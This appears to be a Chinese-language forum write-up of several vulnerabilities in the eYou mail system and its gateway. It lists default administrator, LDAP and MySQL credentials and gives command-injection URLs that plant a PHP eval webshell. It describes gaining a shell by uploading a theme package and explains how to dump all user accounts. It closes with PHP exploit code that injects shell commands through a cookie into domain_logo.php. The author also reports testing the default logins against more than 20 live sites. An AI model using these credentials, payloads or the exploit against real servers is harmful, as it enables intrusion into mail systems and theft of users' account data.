** 1.默認配置漏洞
這里的情況舊版新版都存在。首先默認的網關系統是跟郵件系統在一個機器上的,訪問8080端口即可。
> http://www.target.com/admin/
> 默認賬戶 admin aaaaa,部分站點還有eyoutest之類的賬戶,不知道是不是eyou的工作人員測試的時候留下忘記刪除的賬戶,同樣密碼為aaaaa
登錄后直接導出所有用戶。。。
> 默認LDAP信息:eyouadmin aaaaa
> 默認MySQL信息: root 密碼空
> 網關后台http://www.target.com:8080/admin/或http://www.target.com:8080/gw/admin/
> 有三個默認賬戶,分別為
> admin:+-ccccc
> eyougw:admin@(eyou)
> eyouuser:eyou_admin
網關處的管理員是存放在mysql中,可是eYou產品在安裝過程中沒有任何提示要求更改此處密碼,算是官方留的后門嗎?
查看投遞日志可以查看敏感信息。
** 2.舊版網關漏洞
網關系統這里問題挺嚴重的喔,只要能訪問到網關,只要在網關處能查看到隊列什么的,就能執行命令
利用URL:
> php/mailaction1.php?action=x&index=738952509.37684;echo '<?php eval($_REQUEST[cmd]) ?>'>/opt/apache/htdocs/t1.php
> php/mailaction1.php?action=x&index=738952509.37684;ls>t1.php
index參數沒過濾,直接帶入執行了。
舊版網關很多處地方有類似問題的,認真看下代碼就發現了。
入侵者得到webshell之后,直接使用/var/eyou/sbin/userdb_extract domain就能導出該域下所有用戶的賬戶信息!
這里的影響版本貌似是3.6-4.0
** 3.新版網關漏洞
新版網關比舊版的要安全多了。。。不過它之所以安全多了,是因為把代碼寫復雜了。。。把要研究的人都給繞暈了。。。
順便吐槽下這個新舊版本代碼變化也太大了把。。。
用前面發現的賬戶登錄網關后台。我抓了一大堆網址,然后自己寫腳本來模擬登錄,20+個站點沒有一個修改了該處的密碼。。。所以這里新版后台登錄的成功率是很高的。
新版本的網關,對用戶默認輸入的參數都進行了過濾,過濾了<、>什么的,然后注射啊命令執行什么的暫時還木有發現。
不過在管理配置那里的風格管理,對上傳的風格包,系統沒有任何判斷就直接覆蓋到gw/css/目錄去了。
然后入侵者就簡單了,用上面的后門賬戶登錄網關后台,下載默認的風格包,解壓后加入php文件,然后上傳覆蓋。。。ok,getshell成功,然后就沒然后了。
影響版本為網關4.0以后的版本
** 4.郵箱系統遠程執行漏洞
前面三個項目都或多或少都有條件限制,不夠勁爆,再來個勁爆的,只要郵箱對外訪問,就能直接getshell。
問題在http://www.target.com/grad/admin/domain_logo.php這里,這個文件直接讀取Cookie("cookie"),然后就帶入popen了,沒任何過濾,多好啊。
exp可以參考下面的代碼來寫,很簡單很弱智的漏洞
public function action_test()
{
$domain = $_GET['domain'];
$url = "http://$domain/grad/admin/domain_logo.php";
$cmd = "ls>test.txt";
$req = Request::factory($url)
->cookie('cookie', "/php/lib/;$cmd")
//->send_headers()
->execute();
echo $domain;
echo '<br />';
echo $cmd;
//echo '<br />';
//$remote_url = "http://$domain/grad/admin/test.txt";
//$rs = file_get_contents($remote_url);
//echo $rs ? 'Has bug!' : 'No bug!';
//$req2 = Request::factory($url)
// ->cookie('cookie', "/php/lib/;rm test.txt")
//->send_headers()
// ->execute();
exit;
}